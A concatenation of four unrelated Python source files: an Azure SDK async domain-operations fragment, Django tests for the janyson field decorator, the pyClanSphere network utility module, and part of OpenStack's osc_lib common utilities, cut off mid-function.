:return: DomainOwnershipIdentifier, or the result of cls(response)
:rtype: ~azure.mgmt.web.v2020_09_01.models.DomainOwnershipIdentifier
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.DomainOwnershipIdentifier"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
content_type = kwargs.pop('content_type', "application/json") # type: Optional[str]
_json = self._serialize.body(domain_ownership_identifier, 'DomainOwnershipIdentifier')
request = build_update_ownership_identifier_request(
resource_group_name=resource_group_name,
domain_name=domain_name,
name=name,
subscription_id=self._config.subscription_id,
content_type=content_type,
json=_json,
template_url=self.update_ownership_identifier.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.DefaultErrorResponse, pipeline_response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
deserialized = self._deserialize('DomainOwnershipIdentifier', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
update_ownership_identifier.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DomainRegistration/domains/{domainName}/domainOwnershipIdentifiers/{name}'} # type: ignore
@distributed_trace_async
async def renew(
self,
resource_group_name: str,
domain_name: str,
**kwargs: Any
) -> None:
"""Renew a domain.
Description for Renew a domain.
:param resource_group_name: Name of the resource group to which the resource belongs.
:type resource_group_name: str
:param domain_name: Name of the domain.
:type domain_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: None, or the result of cls(response)
:rtype: None
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
request = build_renew_request(
resource_group_name=resource_group_name,
domain_name=domain_name,
subscription_id=self._config.subscription_id,
template_url=self.renew.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 202, 204]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.DefaultErrorResponse, pipeline_response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
if cls:
return cls(pipeline_response, None, {})
renew.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DomainRegistration/domains/{domainName}/renew'} # type: ignore
|
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from imp import reload
from django.test import TestCase
from django.db.models import QuerySet
from janyson.decorators import add_fields
from . import models
def add_fields_to_item_model(*args, **kwargs):
if not kwargs.pop('no_reload', False):
reload(models)
add_fields(*args, **kwargs)(models.Item)
TEST_NUM = 10
TEST_STR = 'some text'
TEST_LIST = [1, 3, 5]
TEST_DICT = {'a': 'boo', 'b': 3, 'c': True}
TEST_NUM_DEFAULT = 3
TEST_STR_DEFAULT = 'default text'
TEST_LIST_DEFAULT = [1, 2]
TEST_DICT_DEFAULT = {'foo': 'bar', 'baz': None}
FIELDS_WITHOUT_DEFAULT_VALUES = {
'test_num': {
'type': 'num',
},
'test_str': {
'type': 'str',
},
'test_bool': {
'type': 'bool',
'use_default': False,
'default': False,
},
'test_nullbool': {
'type': 'bool',
'use_default': False,
},
'test_list': {
'type': 'list',
},
'test_dict': {
'type': 'dict',
},
}
FIELDS_WITH_DEFAULT_VALUES = {
'test_num': {
'type': 'num',
'use_default': True,
'default': TEST_NUM_DEFAULT,
},
'test_str': {
'type': 'str',
'use_default': True,
'default': TEST_STR_DEFAULT,
},
'test_bool': {
'type': 'bool',
'use_default': True,
'default': False,
},
'test_nullbool': {
'type': 'bool',
'use_default': True,
},
'test_list': {
'type': 'list',
'use_default': True,
'default': TEST_LIST_DEFAULT,
},
'test_dict': {
'type': 'dict',
'use_default': True,
'default': TEST_DICT_DEFAULT,
},
}
FIELDS_FK = {
'fk_instance': {
'type': 'fk',
'model': 'tests.Tag',
'use_instance': True,
},
'fk_no_instance': {
'type': 'fk',
'model': models.Tag,
'use_instance': False,
},
}
FIELDS_M2M = {
'm2m_instance': {
'type': 'm2m',
'model': 'tests.Tag',
'use_instance': True,
},
'm2m_no_instance': {
'type': 'm2m',
'model': models.Tag,
'use_instance': False,
},
}
FIELDS_DIR_HIDE_DEFAULT = {
'test_default_hide': {
'type': 'str',
'use_default': True,
'default': TEST_STR_DEFAULT,
'dir_hide': True,
},
'test_default_no_hide': {
'type': 'str',
'use_default': True,
'default': TEST_STR_DEFAULT,
'dir_hide': False,
},
}
FIELDS_DIR_HIDE_NO_DEFAULT = {
'test_no_default_hide': {
'type': 'str',
'use_default': False,
'dir_hide': True,
},
'test_no_default_no_hide': {
'type': 'str',
'use_default': False,
'dir_hide': False,
},
}
COMMON_FIELD_OPTIONS = {
'type': 'str',
'use_default': True,
'default': TEST_STR_DEFAULT,
}
COMMON_FIELDS_OVERRIDE = {
'str1': {},
'str2': {
'use_default': False,
},
'num': {
'type': 'num',
'default': TEST_NUM_DEFAULT
}
}
class StoredValuesTestCase(TestCase):
JANYSON_FIELD = None
@classmethod
def setUpClass(cls):
super(StoredValuesTestCase, cls).setUpClass()
kwargs = {}
if cls.JANYSON_FIELD:
kwargs['janyson_field'] = cls.JANYSON_FIELD
add_fields_to_item_model(FIELDS_WITHOUT_DEFAULT_VALUES, **kwargs)
item = models.Item.objects.create(name='stored_values')
item.test_num = TEST_NUM
item.test_str = TEST_STR
item.test_bool = True
item.test_nullbool = True
item.test_list = TEST_LIST
item.test_dict = TEST_DICT
item.save()
cls.item_pk = item.pk
def setUp(self):
self.item = models.Item.objects.get(pk=self.item_pk)
def test_num_stored_value(self):
self.assertEqual(self.item.test_num, TEST_NUM)
def test_str_stored_value(self):
self.assertEqual(self.item.test_str, TEST_STR)
def test_bool_stored_value(self):
self.assertIs(self.item.test_bool, True)
def test_nullbool_stored_value(self):
self.assertIs(self.item.test_nullbool, True)
def test_list_stored_value(self):
self.assertListEqual(self.item.test_list, TEST_LIST)
def test_dict_stored_value(self):
self.assertDictEqual(self.item.test_dict, TEST_DICT)
class StoredValuesInAnotherJanySONFieldTestCase(StoredValuesTestCase):
JANYSON_FIELD = 'another_janyson'
class DefaultValuesTestCase(TestCase):
@classmethod
def setUpClass(cls):
super(DefaultValuesTestCase, cls).setUpClass()
add_fields_to_item_model(FIELDS_WITH_DEFAULT_VALUES)
item = models.Item.objects.create(name='default_values')
cls.item_pk = item.pk
def setUp(self):
self.item = models.Item.objects.get(pk=self.item_pk)
def test_num_default_value(self):
self.assertEqual(self.item.test_num, TEST_NUM_DEFAULT)
def test_str_default_value(self):
self.assertEqual(self.item.test_str, TEST_STR_DEFAULT)
def test_bool_default_value(self):
self.assertIs(self.item.test_bool, False)
def test_nullbool_default_value(self):
self.assertIsNone(self.item.test_nullbool)
def test_list_default_value(self):
self.assertListEqual(self.item.test_list, TEST_LIST_DEFAULT)
def test_dict_default_value(self):
self.assertDictEqual(self.item.test_dict, TEST_DICT_DEFAULT)
class NoDefaultValuesTestCase(TestCase):
@classmethod
def setUpClass(cls):
super(NoDefaultValuesTestCase, cls).setUpClass()
add_fields_to_item_model(FIELDS_WITHOUT_DEFAULT_VALUES)
item = models.Item.objects.create(name='no_default_values')
cls.item_pk = item.pk
def setUp(self):
self.item = models.Item.objects.get(pk=self.item_pk)
def test_num_no_default_value_error(self):
with self.assertRaises(AttributeError):
self.item.test_num
def test_str_no_default_value_error(self):
with self.assertRaises(AttributeError):
self.item.test_str
def test_bool_no_default_value_error(self):
with self.assertRaises(AttributeError):
self.item.test_bool
def test_nullbool_no_default_value_error(self):
with self.assertRaises(AttributeError):
self.item.test_nullbool
def test_list_no_default_value_error(self):
with self.assertRaises(AttributeError):
self.item.test_list
def test_dict_no_default_value_error(self):
with self.assertRaises(AttributeError):
self.item.test_dict
class ForeignKeyRelationTestCase(TestCase):
@classmethod
def setUpClass(cls):
super(ForeignKeyRelationTestCase, cls).setUpClass()
add_fields_to_item_model(FIELDS_FK)
tag1 = models.Tag.objects.create(name='tag1')
tag2 = models.Tag.objects.create(name='tag2')
item = models.Item(name='fk')
item.fk_instance = tag1.pk
item.fk_no_instance = tag2.pk
item.save()
def setUp(self):
self.item = models.Item.objects.get(name='fk')
def test_use_instance_true(self):
tag1 = models.Tag.objects.get(name='tag1')
self.assertIsInstance(self.item.fk_instance, models.Tag)
self.assertEqual(self.item.fk_instance, tag1)
def test_use_instance_false(self):
tag2 = models.Tag.objects.get(name='tag2')
self.assertIsInstance(self.item.fk_no_instance, int)
self.assertEqual(self.item.fk_no_instance, tag2.pk)
def test_same_model_instance_assignment_use_instance_true(self):
tag = models.Tag.objects.create(name='new tag')
self.item.fk_instance = tag
self.assertEqual(self.item.fk_instance, tag)
def test_same_model_instance_assignment_use_instance_false(self):
tag = models.Tag.objects.create(name='new tag')
with self.assertRaisesRegexp(TypeError, "invalid value"):
self.item.fk_no_instance = tag
def test_int_assignment_use_instance_true(self):
tag = models.Tag.objects.create(name='new tag')
self.item.fk_instance = tag.pk
self.assertEqual(self.item.fk_instance, tag)
def test_int_instance_assignment_use_instance_false(self):
tag = models.Tag.objects.create(name='new tag')
self.item.fk_no_instance = tag.pk
self.assertEqual(self.item.fk_no_instance, tag.pk)
def test_same_model_instance_assignment_no_pk(self):
tag = models.Tag(name='new tag')
with self.assertRaisesRegexp(TypeError, "no pk"):
self.item.fk_instance = tag
def test_other_model_instance_assignment(self):
another = models.AnotherModel.objects.create(name='another instance')
with self.assertRaisesRegexp(TypeError, "invalid value"):
self.item.fk_instance = another
class ManyToManyRelationTestCase(TestCase):
@classmethod
def setUpClass(cls):
super(ManyToManyRelationTestCase, cls).setUpClass()
add_fields_to_item_model(FIELDS_M2M)
models.Tag.objects.bulk_create(
models.Tag(name='tag{}'.format(i)) for i in range(1, 5))
models.Item.objects.create(name='m2m')
def setUp(self):
self.item = models.Item.objects.get(name='m2m')
self.tags = models.Tag.objects.exclude(name='tag4')
def test_use_instance_true(self):
self.item.m2m_instance = self.tags
self.assertListEqual(list(self.item.m2m_instance), list(self.tags))
def test_use_instance_false(self):
tags_pk = [tag.pk for tag in self.tags]
self.item.m2m_no_instance = tags_pk
self.assertListEqual(self.item.m2m_no_instance, tags_pk)
def test_same_model_queryset_assignment_use_instance_true(self):
tags = models.Tag.objects.exclude(name='tag1')
self.item.m2m_instance = tags
self.assertIsInstance(self.item.m2m_instance, QuerySet)
self.assertEqual(list(self.item.m2m_instance), list(tags))
def test_same_model_queryset_assignment_use_instance_false(self):
tags_pk = [t.pk for t in
models.Tag.objects.exclude(name__in=['tag1', 'tag3'])]
self.item.m2m_no_instance = tags_pk
self.assertIsInstance(self.item.m2m_no_instance, list)
self.assertEqual(self.item.m2m_no_instance, tags_pk)
def test_int_assignment_use_instance_true(self):
tags_pk = models.Tag.objects.exclude(
name='tag3').values_list('pk', flat=True)
self.item.m2m_instance = list(tags_pk)
self.assertIsInstance(self.item.m2m_instance, QuerySet)
self.assertEqual(list(self.item.m2m_instance),
list(models.Tag.objects.filter(pk__in=tags_pk)))
def test_int_assignment_use_instance_false(self):
tags_pk = models.Tag.objects.exclude(
name='tag2').values_list('pk', flat=True)
self.item.m2m_no_instance = list(tags_pk)
self.assertIsInstance(self.item.m2m_no_instance, list)
self.assertEqual(self.item.m2m_no_instance, list(tags_pk))
def test_neg_int_assignment(self):
exclude_tag_pk = models.Tag.objects.get(name='tag3').pk
tags = models.Tag.objects.exclude(pk=exclude_tag_pk)
self.item.m2m_instance = [-exclude_tag_pk]
self.assertIsInstance(self.item.m2m_instance, QuerySet)
self.assertEqual(list(self.item.m2m_instance), list(tags))
def test_asterisk_assignment(self):
tags = models.Tag.objects.all()
self.item.m2m_instance = '*'
self.assertIsInstance(self.item.m2m_instance, QuerySet)
self.assertEqual(list(self.item.m2m_instance), list(tags))
def test_empty_assignment(self):
self.item.m2m_instance = []
self.assertIsInstance(self.item.m2m_instance, QuerySet)
self.assertEqual(list(self.item.m2m_instance), [])
def test_list_of_instances_assignment(self):
tags = [t for t in models.Tag.objects.all()]
self.item.m2m_instance = tags
self.assertIsInstance(self.item.m2m_instance, QuerySet)
self.assertEqual(list(self.item.m2m_instance), list(tags))
def test_list_of_instances_no_pk_assignment(self):
tags = [t for t in models.Tag.objects.all()]
tags.append(models.Tag(name='no pk'))
with self.assertRaisesRegexp(TypeError, "no pk"):
self.item.m2m_instance = tags
def test_list_of_instances_another_model_assignment(self):
tags = [t for t in models.Tag.objects.all()]
tags.append(models.Item(name='no pk'))
with self.assertRaisesRegexp(TypeError, "invalid value"):
self.item.m2m_instance = tags
def test_wrong_value_type_assignment(self):
tags = 'foo bar'
with self.assertRaisesRegexp(TypeError, "invalid value"):
self.item.m2m_instance = tags
class DeletionTestCase(TestCase):
@classmethod
def setUpClass(cls):
super(DeletionTestCase, cls).setUpClass()
add_fields_to_item_model(FIELDS_WITH_DEFAULT_VALUES)
add_fields_to_item_model(FIELDS_FK, no_reload=True)
add_fields_to_item_model(FIELDS_M2M, no_reload=True)
models.Item.objects.create(name='deletion')
def setUp(self):
self.item = models.Item.objects.get(name='deletion')
def test_set_and_delete(self):
self.item.test_num = TEST_NUM
self.assertEqual(self.item.test_num, TEST_NUM)
del self.item.test_num
self.assertEqual(self.item.test_num, TEST_NUM_DEFAULT)
def test_delete_already_deleted_from_json(self):
self.item.test_num = TEST_NUM
del self.item.janyson['test_num']
with self.assertRaisesRegexp(AttributeError, "test_num"):
del self.item.test_num
def test_delete_fk_cache(self):
tag = models.Tag.objects.create(name='test')
self.item.fk_instance = tag
self.assertFalse(hasattr(self.item, '_jnsn_cache'))
self.item.fk_instance
self.assertEqual(self.item._jnsn_cache['fk_instance_instance'], tag)
del self.item.fk_instance
self.assertNotIn('fk_instance_instance', self.item._jnsn_cache)
def test_delete_m2m_cache(self):
models.Tag.objects.create(name='test1')
models.Tag.objects.create(name='test2')
tags = models.Tag.objects.all()
self.item.m2m_instance = tags
self.assertFalse(hasattr(self.item, '_jnsn_cache'))
self.item.m2m_instance
self.assertEqual(
list(self.item._jnsn_cache['m2m_instance_queryset']), list(tags))
del self.item.m2m_instance
self.assertNotIn('m2m_instance_queryset', self.item._jnsn_cache)
class DirHideTestCase(TestCase):
@classmethod
def setUpClass(cls):
super(DirHideTestCase, cls).setUpClass()
add_fields_to_item_model(FIELDS_DIR_HIDE_DEFAULT)
add_fields_to_item_model(FIELDS_DIR_HIDE_NO_DEFAULT, no_reload=True)
def setUp(self):
self.item = models.Item(name='dir_hide')
def test_no_value_no_default_no_hide(self):
self.assertIn('test_no_default_no_hide', dir(self.item))
def test_no_value_no_default_hide(self):
self.assertNotIn('test_no_default_hide', dir(self.item))
def test_value_no_hide(self):
self.item.test_no_default_no_hide = 'foo'
self.assertIn('test_no_default_no_hide', dir(self.item))
def test_value_hide(self):
self.item.test_no_default_hide = 'foo'
self.assertIn('test_no_default_hide', dir(self.item))
def test_default_no_hide(self):
self.assertIn('test_default_no_hide', dir(self.item))
def test_default_hide(self):
self.assertIn('test_default_hide', dir(self.item))
class CommonFieldOptionsTestCase(TestCase):
@classmethod
def setUpClass(cls):
super(CommonFieldOptionsTestCase, cls).setUpClass()
add_fields_to_item_model(
COMMON_FIELDS_OVERRIDE, field_options=COMMON_FIELD_OPTIONS)
def setUp(self):
self.item = models.Item(name='common_field_options')
def test_no_override(self):
self.assertEqual(self.item.str1, TEST_STR_DEFAULT)
def test_override_use_default(self):
with self.assertRaises(AttributeError):
self.item.str2
def test_override_type_and_default(self):
self.assertEqual(self.item.num, TEST_NUM_DEFAULT)
class AcceptableFieldsArgTypesTestCase(TestCase):
def test_fields_as_dict_without_common_fields_options(self):
add_fields_to_item_model(COMMON_FIELDS_OVERRIDE)
item = models.Item(name='fields_as_dict')
item.num = TEST_NUM
self.assertEqual(item.num, TEST_NUM)
def test_fields_as_dict_with_common_fields_options(self):
add_fields_to_item_model(
COMMON_FIELDS_OVERRIDE, field_options=COMMON_FIELD_OPTIONS)
item = models.Item(name='fields_as_dict_with_common')
self.assertEqual(item.str1, TEST_STR_DEFAULT)
def test_fields_as_list_without_common_fields_options(self):
with self.assertRaisesRegexp(ValueError, "common field options"):
add_fields_to_item_model(['str1', 'str2'])
def test_fields_as_list_with_common_fields_options(self):
add_fields_to_item_model(
['str1', 'str2'], field_options=COMMON_FIELD_OPTIONS)
item = models.Item(name='fields_as_list_with_common')
item.str2 = TEST_STR
self.assertEqual(item.str1, TEST_STR_DEFAULT)
self.assertEqual(item.str2, TEST_STR)
def test_fields_as_str_with_common_fields_options(self):
with self.assertRaisesRegexp(TypeError, "'fields' must be"):
add_fields_to_item_model(
'str1', field_options=COMMON_FIELD_OPTIONS)
|
|
# -*- coding: utf-8 -*-
"""
pyClanSphere.utils.net
~~~~~~~~~~~~~~~~~~~~~~
This module implements various network related functions and among
others a minimal urllib implementation that supports timeouts.
:copyright: (c) 2009 - 2010 by the pyClanSphere Team,
see AUTHORS for more details.
:license: BSD, see LICENSE for more details.
"""
from cStringIO import StringIO, InputType
import os
import urlparse
import socket
import httplib
from werkzeug import Headers, url_decode, cached_property
from werkzeug.contrib.iterio import IterO
from pyClanSphere.application import Response, get_application
from pyClanSphere.utils.datastructures import OrderedDict
from pyClanSphere.utils.exceptions import pyClanSphereException
def open_url(url, data=None, timeout=None,
allow_internal_requests=True, **kwargs):
"""This function parses the URL and opens the connection. The
following protocols are supported:
- `http`
- `https`
Per default requests to pyClanSphere itself trigger an internal request. This
can be disabled by setting `allow_internal_requests` to False.
"""
app = get_application()
if timeout is None:
timeout = app.cfg['default_network_timeout']
parts = urlparse.urlsplit(url)
if app is not None:
site_url = urlparse.urlsplit(app.cfg['site_url'])
if allow_internal_requests and \
parts.scheme in ('http', 'https') and \
site_url.netloc == parts.netloc and \
parts.path.startswith(site_url.path):
path = parts.path[len(site_url.path):].lstrip('/')
method = kwargs.pop('method', None)
if method is None:
method = data is not None and 'POST' or 'GET'
make_response = lambda *a: URLResponse(url, *a)
return app.perform_subrequest(path.decode('utf-8'),
url_decode(parts.query),
method, data, timeout=timeout,
response_wrapper=make_response,
**kwargs)
handler = _url_handlers.get(parts.scheme)
if handler is None:
raise URLError('unsupported URL schema %r' % parts.scheme)
if isinstance(data, basestring):
data = StringIO(data)
try:
obj = handler(parts, timeout, **kwargs)
return obj.open(data)
except Exception, e:
if not isinstance(e, NetException):
e = NetException('%s: %s' % (e.__class__.__name__, str(e)))
raise e
def create_connection(address, timeout=30):
"""Connect to address and return the socket object."""
msg = "getaddrinfo returns an empty list"
host, port = address
for res in socket.getaddrinfo(host, port, 0, socket.SOCK_STREAM):
af, socktype, proto, canonname, sa = res
sock = None
try:
sock = socket.socket(af, socktype, proto)
sock.settimeout(timeout)
sock.connect(sa)
return sock
except socket.error, msg:
if sock is not None:
sock.close()
raise ConnectionError(msg)
def get_content_length(data_or_fp):
"""Try to get the content length from the given string or file
pointer. If the length can't be determined the return value
is None.
"""
try:
return len(data_or_fp)
except TypeError:
# special-case cStringIO objects which have no fs entry
if isinstance(data_or_fp, InputType):
return len(data_or_fp.getvalue())
try:
return os.fstat(data_or_fp.fileno().st_size)
except (AttributeError, OSError):
pass
class NetException(pyClanSphereException):
pass
class CannotSendRequest(NetException):
pass
class BadStatusLine(NetException):
pass
class URLError(NetException):
pass
class ConnectionError(NetException):
pass
class URLHandler(object):
default_port = 0
def __init__(self, parsed_url, timeout=30):
self.parsed_url = parsed_url
self.timeout = timeout
self.closed = False
self._socket = None
self._buffer = []
@property
def addr(self):
"""The address tuple."""
netloc = self.parsed_url.netloc
if netloc.startswith('['):
host_end = netloc.find(']')
if host_end < 0:
raise URLError('invalid ipv6 address')
host = netloc[1:host_end]
port = netloc[host_end + 2:]
else:
pieces = netloc.split(':', 1)
if len(pieces) == 1:
host = pieces[0]
port = None
else:
host, port = pieces
if not port:
port = self.default_port
else:
try:
port = int(port)
except ValueError:
raise URLError('not a valid port number')
return host, port
@property
def host_string(self):
host, port = self.addr
try:
host = host.encode('ascii')
except UnicodeError:
host = host.encode('idna')
if port != self.default_port:
host = '%s:%d' % (host, port)
return host
@property
def host(self):
return self.addr[0]
@property
def port(self):
return self.addr[1]
@property
def url(self):
return urlparse.urlunsplit(self.parsed_url)
@property
def socket(self):
if self._socket is None:
if self.closed:
raise TypeError('handler closed')
self._socket = self.connect()
return self._socket
def connect(self):
return create_connection(self.addr, self.timeout)
def close(self):
if self._socket is not None:
self._socket.close()
self._socket = None
self.closed = True
def send(self, data):
if self._buffer:
self.send_buffer()
if data is None:
return
try:
if hasattr(data, 'read'):
while 1:
s = data.read(8192)
if not s:
break
self.socket.sendall(s)
else:
self.socket.sendall(data)
except socket.error, v:
if v[0] == 32: # Broken pipe
self.close()
raise
def send_buffered(self, data):
if hasattr(data, 'read'):
data = data.read()
self._buffer.append(data)
def send_buffer(self):
buffer = ''.join(self._buffer)
del self._buffer[:]
self.send(buffer)
def open(self, data=None):
"""Return a `URLResponse` object."""
return Response()
class HTTPHandler(URLHandler):
"""Opens HTTP connections."""
default_port = 80
http_version = '1.1'
STATE_IDLE, STATE_SENDING, STATE_SENT = range(3)
def __init__(self, parsed_url, timeout=30, method=None):
URLHandler.__init__(self, parsed_url, timeout)
self.headers = Headers()
self._state = self.STATE_IDLE
self._method = method
@property
def method(self):
return self._method or 'GET'
def send(self, data):
if self._state == self.STATE_IDLE:
self._state = self.STATE_SENDING
return URLHandler.send(self, data)
def send_request(self, data):
path = self.parsed_url.path or '/'
if self.parsed_url.query:
path += '?' + self.parsed_url.query
self.send_buffered('%s %s HTTP/%s\r\n' % (self._method, str(path),
self.http_version))
self.send_buffered('\r\n'.join('%s: %s' % item for item in
self.headers.to_list()) + '\r\n\r\n')
if isinstance(data, basestring):
self.send_buffered(data)
data = None
self.send(data)
self._state = self.STATE_SENT
def open(self, data=None):
# if no method is set switch between GET and POST based on
# the data. This is for example the case if the URL was
# opened with open_url().
if self._method is None:
if data is not None:
self._method = 'POST'
else:
self._method = 'GET'
if self._state != self.STATE_IDLE:
raise CannotSendRequest()
if self.http_version == '1.1':
if 'host' not in self.headers:
self.headers['Host'] = self.host_string
if 'accept-encoding' not in self.headers:
self.headers['Accept-Encoding'] = 'identity'
if 'content-length' not in self.headers:
content_length = get_content_length(data)
if content_length is not None:
self.headers['Content-Length'] = content_length
self.send_request(data)
return HTTPResponse(self)
class HTTPSHandler(HTTPHandler):
"""Opens HTTPS connections."""
default_port = 443
def __init__(self, parsed_url, timeout=30,
default_method=None, key_file=None,
cert_file=None):
HTTPHandler.__init__(self, parsed_url, timeout, default_method)
self.key_file = key_file
self.cert_file = cert_file
def connect(self):
try:
# 2.6 and higher
from ssl import wrap_socket
except ImportError:
# 2.4 and 2.5
from httplib import FakeSocket
def wrap_socket(sock, key, cert):
ssl = socket.ssl(sock, key, cert)
return FakeSocket(sock, ssl)
return wrap_socket(HTTPHandler.connect(self),
self.key_file, self.cert_file)
class URLResponse(Response):
def __init__(self, url, body, status=200, headers=None):
Response.__init__(self, body, status, headers)
self.url = url
@cached_property
def stream(self):
return IterO(self.response)
class HTTPResponse(URLResponse):
def __init__(self, http_handler):
self._socket = http_handler.socket
resp = httplib.HTTPResponse(self._socket,
method=http_handler._method)
resp.begin()
headers = resp.getheaders()
def make_iterable():
while 1:
data = resp.read(8092)
if not data:
break
yield data
URLResponse.__init__(self, http_handler.url, make_iterable(),
resp.status, headers)
self._httplib_resp = resp
def close(self):
Response.close(self)
if self._socket is not None:
self._socket.close()
self._socket = None
if self._httplib_resp is not None:
self._httplib_resp.close()
self._httplib_resp = None
_url_handlers = {
'http': HTTPHandler,
'https': HTTPSHandler
}
|
|
# Copyright 2012-2013 OpenStack Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
"""Common client utilities"""
import copy
import getpass
import logging
import os
import six
import time
import warnings
from cliff import columns as cliff_columns
from oslo_utils import importutils
from osc_lib import exceptions
from osc_lib.i18n import _
LOG = logging.getLogger(__name__)
def backward_compat_col_lister(column_headers, columns, column_map):
"""Convert the column headers to keep column backward compatibility.
Replace the new column name of column headers by old name, so that
the column headers can continue to support to show the old column name by
--column/-c option with old name, like: volume list -c 'Display Name'
:param column_headers: The column headers to be output in list command.
:param columns: The columns to be output.
:param column_map: The key of map is old column name, the value is new
column name, like: {'old_col': 'new_col'}
"""
if not columns:
return column_headers
# NOTE(RuiChen): column_headers may be a tuple in some code, like:
# volume v1, convert it to a list in order to change
# the column name.
column_headers = list(column_headers)
for old_col, new_col in six.iteritems(column_map):
if old_col in columns:
LOG.warning(_('The column "%(old_column)s" was deprecated, '
'please use "%(new_column)s" replace.') % {
'old_column': old_col,
'new_column': new_col}
)
if new_col in column_headers:
column_headers[column_headers.index(new_col)] = old_col
return column_headers
def backward_compat_col_showone(show_object, columns, column_map):
"""Convert the output object to keep column backward compatibility.
Replace the new column name of output object by old name, so that
the object can continue to support to show the old column name by
--column/-c option with old name, like: volume show -c 'display_name'
:param show_object: The object to be output in create/show commands.
:param columns: The columns to be output.
:param column_map: The key of map is old column name, the value is new
column name, like: {'old_col': 'new_col'}
"""
if not columns:
return show_object
show_object = copy.deepcopy(show_object)
for old_col, new_col in six.iteritems(column_map):
if old_col in columns:
LOG.warning(_('The column "%(old_column)s" was deprecated, '
'please use "%(new_column)s" replace.') % {
'old_column': old_col,
'new_column': new_col}
)
if new_col in show_object:
show_object.update({old_col: show_object.pop(new_col)})
return show_object
def build_kwargs_dict(arg_name, value):
"""Return a dictionary containing `arg_name` if `value` is set."""
kwargs = {}
if value:
kwargs[arg_name] = value
return kwargs
def calculate_header_and_attrs(column_headers, attrs, parsed_args):
"""Calculate headers and attribute names based on parsed_args.column.
When --column (-c) option is specified, this function calculates
column headers and expected API attribute names according to
the OSC header/column definitions.
This function also adjusts the content of parsed_args.columns
if API attribute names are used in parsed_args.columns.
This allows users to specify API attribute names in -c option.
:param column_headers: A tuple/list of column headers to display
:param attrs: a tuple/list of API attribute names. The order of
corresponding column header and API attribute name must match.
:param parsed_args: Parsed argument object returned by argparse parse_args
:returns: A tuple of calculated headers and API attribute names.
"""
if parsed_args.columns:
header_attr_map = dict(zip(column_headers, attrs))
expected_attrs = [header_attr_map.get(c, c)
for c in parsed_args.columns]
attr_header_map = dict(zip(attrs, column_headers))
expected_headers = [attr_header_map.get(c, c)
for c in parsed_args.columns]
# If attribute name is used in parsed_args.columns
# convert it into display names because cliff expects
# name in parsed_args.columns and name in column_headers matches.
parsed_args.columns = expected_headers
return expected_headers, expected_attrs
else:
return column_headers, attrs
def env(*vars, **kwargs):
"""Search for the first defined of possibly many env vars
Returns the first environment variable defined in vars, or
returns the default defined in kwargs.
"""
for v in vars:
value = os.environ.get(v, None)
if value:
return value
return kwargs.get('default', '')
def find_min_match(items, sort_attr, **kwargs):
"""Find all resources meeting the given minimum constraints
:param items: A List of objects to consider
:param sort_attr: Attribute to sort the resulting list
:param kwargs: A dict of attributes and their minimum values
:rtype: A list of resources osrted by sort_attr that meet the minimums
"""
def minimum_pieces_of_flair(item):
"""Find lowest value greater than the minumum"""
result = True
for k in kwargs:
# AND together all of the given attribute results
result = result and kwargs[k] <= get_field(item, k)
return result
return sort_items(filter(minimum_pieces_of_flair, items), sort_attr)
def find_resource(manager, name_or_id, **kwargs):
"""Helper for the _find_* methods.
:param manager: A client manager class
:param name_or_id: The resource we are trying to find
:param kwargs: To be used in calling .find()
:rtype: The found resource
This method will attempt to find a resource in a variety of ways.
Primarily .get() methods will be called with `name_or_id` as an integer
value, and tried again as a string value.
If both fail, then a .find() is attempted, which is essentially calling
a .list() function with a 'name' query parameter that is set to
`name_or_id`.
Lastly, if any kwargs are passed in, they will be treated as additional
query parameters. This is particularly handy in the case of finding
resources in a domain.
"""
# Case 1: name_or_id is an ID, we need to call get() directly
# for example: /projects/454ad1c743e24edcad846d1118837cac
# For some projects, the name only will work. For keystone, this is not
# enough information, and domain information is necessary.
try:
return manager.get(name_or_id)
except Exception:
pass
if kwargs:
# Case 2: name_or_id is a name, but we have query args in kwargs
# for example: /projects/demo&domain_id=30524568d64447fbb3fa8b7891c10dd
try:
return manager.get(name_or_id, **kwargs)
except Exception:
pass
# Case 3: Try to get entity as integer id. Keystone does not have integer
# IDs, they are UUIDs, but some things in nova do, like flavors.
try:
if isinstance(name_or_id, int) or name_or_id.isdigit():
return manager.get(int(name_or_id), **kwargs)
# FIXME(dtroyer): The exception to catch here is dependent on which
# client library the manager passed in belongs to.
# Eventually this should be pulled from a common set
# of client exceptions.
except Exception as ex:
if (type(ex).__name__ == 'NotFound' or
type(ex).__name__ == 'HTTPNotFound' or
type(ex).__name__ == 'TypeError'):
pass
else:
raise
# Case 4: Try to use find.
# Reset the kwargs here for find
if len(kwargs) == 0:
kwargs = {}
try:
# Prepare the kwargs for calling find
if 'NAME_ATTR' in manager.resource_class.__dict__:
# novaclient does this for oddball resources
kwargs[manager.resource_class.NAME_ATTR] = name_or_id
else:
